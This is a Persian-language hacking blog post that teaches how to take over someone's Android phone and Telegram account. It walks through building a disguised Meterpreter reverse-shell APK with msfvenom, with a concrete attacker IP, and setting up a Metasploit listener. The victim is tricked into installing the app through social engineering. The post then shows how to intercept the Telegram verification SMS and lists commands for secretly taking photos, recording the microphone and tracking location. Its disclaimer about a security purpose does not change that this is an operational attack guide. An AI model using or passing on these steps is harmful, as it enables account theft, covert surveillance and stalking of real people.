H a K c i N G 32

هک و امنیت

H a K c i N G 32

هک و امنیت

https://t.me/hacking32 =ادرس کانال تلگرام ما
H a K c i N G 32
نویسندگان

آموزش نفوذ به گوشی اندروید و هک تلگرام با کالی لینوکس

در این آموزش یاد میگیرید چگونه با متااسپویلت در کالی لینوکس ابتدا از اندروید فرد مورد نظر دسترسی بگیرید و سپس  تلگرام ان را هک کنید

این آموزش صرفا به منظور افزایش امنیت کاربران ایرانی و علاقه مندان میباشد و هرگونه سوء استفاده احتمالی بر عهده کاربر است.

ر آموزش ابتدا به گوشی اندروید و سپس تلگرام قربانی دسترسی پیدا کرده و آن را هک می کنیم .

برای این کار از سیستم عامل  کالی لینوکس استفاده می کنیم و سپس صفحه معروف لینوکسی ها ترمینال (Terminal) رو باز می کنیم

و  ابزار msfvenom برای ساخت اکسپلویت اندرویدی فراخوانی می کنیم

به این شکل

  <msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

LHOST: برای بدست آوردن LHOST کافیست در مرورگر عبارت my ip را بنویسید و نتیجه را به صورت شکل زیر ببینید

 

 

 

 msfvenom1

 

.

LPORT: منظور شماره پورتی است که برای دریافت ارتباط استفاده میشود که باید در بخش تنظیمات Port Forwarding مودمتان آن را تنظیم کنید

 

 

 

 msfvenom2

 

 

 

 Server IP Address: با استفاده از دستور ifconfig  می توانید آن را بدست آورید

msfvenom3

 

 

Name.apk : نام اپلیکشینی است که برای تارگت (قربانی) انتخاب می کنید که قرار است آن را اجرا کند تا دسترسی لازم برای ما ایجاد شود

 

 

 msfvenom4

 

 و در نهایت

 msfvenom -p android/meterpreter/reverse_tcp LHOST=46.21.83.60 LPORT=443 vpn.apk

 

نکته:اکنون نفوذگر باید یک اکسپلویت گوش دهنده و یک پیلود برای برقرای ارتباط-معکوس در داخل متااسپولیت تنظیم کند.هدف از تنظیم این این دو ماژول این است،زمانی که هدف (قربانی) قایل نفوذگر و باحداقل دسترسی ایجاد شده است را توسط پیلود مورد نظر حفظ نماید و حمله ی خود را پیاده سازی کند :

 

Msf>use exploit/multi/handler

Msf>set PAYLOAD android/meterpreter/reverse_tcp

Msf>set LHOST 192.168.1.35

Msf>set LPORT 443

Msf>show options

دستور بالا را میزنیم تا  اعمال تغییرات را مشاهده کنیم

 

 

 msfvenom5

 

 

دقت داشته باشید،هرمقداری که درگام دوم به فیلدهای LHOST و LPORT نسبت داده اید،دوباره باید در فیلدهای بالا نیز وارد کنید

بعد از انجام این مراحل از طریق مهندسی اجتماعی  برنامه ای که خودتان ساخته اید را به قربانی می دهید و منتظر می مانید تا آن را اجرا کند.

قبل اجرا دستور exploit را در کنسول متااسپویلت تان می نویسید و منتظر اجرا برنامه توسط قربانی می مانید.

بعد از اجرا برنامه توسط قربانی،اکنون اندروید فرد مورد نظر را در اختیار خود دارید

برای آن که کدی که تلگرام برای قربانی ارسال می کند را بدست بیاورید یکی از راه ها این است که به صورت وب وارد سایت تلگرام شوید و شماره فرد مورد نظر را در تلگرام وارد کنید تا کدی برای تاییدیه به حساب کاربری برای قربانی از طرف تلگرام ارسال شود

و ازآن طریق آن می توانید  کد را روبوده و تلگرام آن فرد مورد نظر را بدست آورید.

 

 

 msfvenom6

 

 

با زدن دستور dump_sms  می توانید پیام های دریافتی قربانی رو مشاهده کنید این پیام ها بصورت txt در پوشه Home ذخیره می شود.

 

 msfvenom7

 

و به این صورت می توانید کد تلگرام را بدست آورید.

 

 

 msfvenom8

 

 

شما می توانید علاوه بر دریافت اس ام اس از قربانی از دوربین جلو و پشت گوشی فرد مورد عکس گرفته بدون آن قربانی متوجه شود

لیستی از کامندهایی که می توانید اندروید قربانی را بدست بگیرید را نیز برای شما قرار می دهم:

Android Commands

================

    Command        Description

    ——-        ———–

    check_root     Check if device is rooted

    dump_calllog   Get call log

    dump_contacts  Get contacts list

    dump_sms       Get sms messages

    geolocate      Get current lat-long using geolocation

Stdapi: Webcam Commands

=======================

    Command        Description

    ——-        ———–

    record_mic     Record audio from the default microphone for X seconds

    webcam_chat    Start a video chat

    webcam_list    List webcams

    webcam_snap    Take a snapshot from the specified webcam

    webcam_stream  Play a video stream from the specified webcam

دانلود فیلم آموزشی

مسئولیت استفاده نامناسب به عهده ی خود کاربر می باشد

نظرات  (۱)

اگر هک کردن اینقدر راحته چرا هیچ کس نمیره جایزه یه میلیون دلاری برای هک تلگرام رو بگیره ؟!!!
پاسخ:
دوست عزیز این آموزش مربوط به هک گوشی می باشد که پس از هک گوشی و sms ها کد تاییدی تلگرام رو به گوشی فرد می فرسته و تلگرام اون هک میشه. خود تلگرام به طور مستقیم فعلا به هیچ وجه امکان پذیر نمی باشد
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی